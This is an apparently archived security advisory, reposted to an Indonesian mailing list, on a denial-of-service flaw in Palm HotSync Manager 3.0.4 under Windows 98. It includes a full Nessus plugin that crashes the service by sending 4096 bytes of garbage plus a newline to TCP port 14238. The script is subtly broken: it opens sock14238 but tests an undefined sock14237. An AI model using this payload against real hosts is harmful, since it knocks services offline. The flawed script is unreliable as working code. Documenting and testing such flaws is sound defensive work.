Palm HotSync Manager is vulnerable to Denial of Service attack
----------------------------------------------------------------------------
----
SUMMARY
HotSync Manager provides network synchronization between the Palm Desktop
and a remote Palm PDA that is connected via the Internet. This feature is
used to backup the information from the Palm PDA to a secure location.
However, using HotSync Manager over the network exposes it to an attack,
where anyone with network connection to the station running HotSync
Manager can crash the application and possibly execute arbitrary code.
DETAILS
Vulnerable systems:
HotSync Manager 3.0.4 under Windows 98
Non vulnerable systems:
HotSync Manager 3.0.4 under Windows 2000
Exploit:
By connecting to the HotSync Manager's TCP listening port (TCP port
14238), and sending a large amount of data followed by a newline, it is
possible to crash the HotSync Manager.
The following Nessus Plugin can be used to test this:
#
# This script was written by Noam Rathaus <[EMAIL PROTECTED]>
#
# See the Nessus Scripts License for details
#
#
if(description)
{
name["english"] = "HotSync Manager Denial of Service attack";
script_name(english:name["english"]);
desc["english"] = "It is possible to cause HotSync Manager to crash by
sending a few bytes
of garbage into its listening port TCP 14238.
Solution: Block those ports from outside communication
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "HotSync Manager Denial of Service attack";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam");
family["english"] = "Windows";
script_family(english:family["english"]);
exit(0);
}
#
# The script code starts here
#
if (get_port_state(14238))
{
sock14238 = open_sock_tcp(14238);
if (sock14237)
{
data_raw = crap(4096) + string("\n");
send(socket:sock14238, data:data_raw);
close(sock14238);
sleep(5);
sock14238_sec = open_sock_tcp(14238);
if (sock14238_sec)
{
security_warning(port:14238, data:"HotSync Manager port is open.");
}
else
{
security_hole(port:14238);
}
}
}
ADDITIONAL INFORMATION
3Com's Palm computing team is aware of the problem and will fix this issue
in the next release of the HotSync Manager.
========================================
-------
AFLHI 058009990407128029/089802---(102598//991024)
milis ini didukung oleh :
>> http://www.indolinux.com - dunia linux indonesia
-------------------------------------------------------------------
untuk berhenti kirim email ke [EMAIL PROTECTED]
untuk melihat peraturan kirim email ke [EMAIL PROTECTED]
arsip berada di http://www.mail-archive.com/[email protected]
